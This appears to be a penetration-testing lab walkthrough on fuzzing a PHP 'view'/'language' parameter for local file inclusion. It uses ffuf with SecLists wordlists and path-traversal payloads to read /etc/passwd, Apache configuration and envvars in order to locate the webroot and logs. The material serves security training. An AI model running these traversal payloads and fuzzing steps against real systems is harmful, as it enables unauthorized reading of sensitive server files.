FUZZING FOR LFI PAYLOADS (AUTOMATED)
Last updated
Last updated
#walk the application
root@oco:~$ BROWSER > http://83.136.249.42:34148/
* nothing significant found as there aren't any links to exploit#scan for exposed parameter
root@oco:~$ find / -iname burp-* 2>/dev/null
/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt .
root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?FUZZ=value' -fs 2287
xjxevt [Status: 200, Size: 2309, Words: 571, Lines: 56, Duration: 77ms]
xjxmthd [Status: 200, Size: 2309, Words: 571, Lines: 56, Duration: 77ms]
xjxfun [Status: 200, Size: 2309, Words: 571, Lines: 56, Duration: 77ms]
...
* filter out "2309"
root@oco:~$ ffuf -w burp-parameter-names.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?FUZZ=value' -fs 2309
view [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 77ms]#expand scanning via LFI-Jhaddix.txt
root@oco:~$ find / -iname LFI-Jhaddix.txt 2>/dev/null
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
root@oco:~$ cp /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt .
root@oco:~$ ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?view=FUZZ' -fs 2287
/var/lp/logs/lpNet [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 78ms]
/var/run/httpd.pid [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 78ms]
/var/lp/logs/requests [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 80ms]
/var/mysql.log [Status: 200, Size: 1935, Words: 515, Lines: 56, Duration: 80ms]
* the LFI-Jhaddix.txt is a good wordlist as it contains various bypasses and common files
- filter out 1935
root@oco:~$ ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://94.237.54.42:56854/index.php?view=FUZZ' -fs 1935
../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]
../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 77ms]#manually test the identified payloads from LFI-Jhaddix.txt to verify that they work as expected and show the included file content
root@oco:~$ BROWSER > {targetSite:port}/index.php?view=../../../../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologthe server files that may be helpful in LFI exploitation are: server webroot path, server configuration files and server logs. knowing where such files exists and whether they can be read will assist attackers further in LFI exploitations.
this method is used to when locating the attacker's uploaded files through absolute paths rather than relative paths.
#
root@thm:~$ ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
/var/www/html/ [Status: 200, Size: 0, Words: 1, Lines: 1]
* depending on the LFI situation, it may be necessary to add a few ". ../../../../"
server configurations tend to contain the webroot and other important information.
#identify server logs/configuration locations
root@oco:~$ wget https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
root@oco:~$ ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?{language}=../../../../FUZZ' -fs 2287
/etc/hosts [Status: 200, Size: 2461, Words: 636, Lines: 72]
/etc/hostname [Status: 200, Size: 2300, Words: 634, Lines: 66]
/etc/login.defs [Status: 200, Size: 12837, Words: 2271, Lines: 406]
/etc/fstab [Status: 200, Size: 2324, Words: 639, Lines: 66]
/etc/apache2/apache2.conf [Status: 200, Size: 9511, Words: 1575, Lines: 292]
/etc/issue.net [Status: 200, Size: 2306, Words: 636, Lines: 66]
...SNIP...
/etc/apache2/mods-enabled/status.conf [Status: 200, Size: 3036, Words: 715, Lines: 94]
/etc/apache2/mods-enabled/alias.conf [Status: 200, Size: 3130, Words: 748, Lines: 89]
/etc/apache2/envvars [Status: 200, Size: 4069, Words: 823, Lines: 112]
/etc/adduser.conf [Status: 200, Size: 5315, Words: 1035, Lines: 153]
* again depending on the LFI situation, it may be necessary to add a few ". ../../../../"
#read the configuration file to determine webroot path and the log path
root@oco:~$ curl http://<SERVER_IP>:<PORT>/index.php?{language}=../../../../etc/apache2/apache2.conf
...SNIP...
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
...SNIP...
* the APACHE_LOG_DIR's exact location is in /etc/apache2/envvars
root@oco:~$ curl http://<SERVER_IP>:<PORT>/index.php?{language}=../../../../etc/apache2/envvars
...SNIP...
export APACHE_RUN_USER=www-data
export APACHE_RUN_GROUP=www-data
# temporary state file location. This might be changed to /run in Wheezy+1
export APACHE_PID_FILE=/var/run/apache2$SUFFIX/apache2.pid
export APACHE_RUN_DIR=/var/run/apache2$SUFFIX
export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX
# Only /var/log/apache2 is handled by /etc/logrotate.d/apache2.
export APACHE_LOG_DIR=/var/log/apache2$SUFFIX
...SNIP...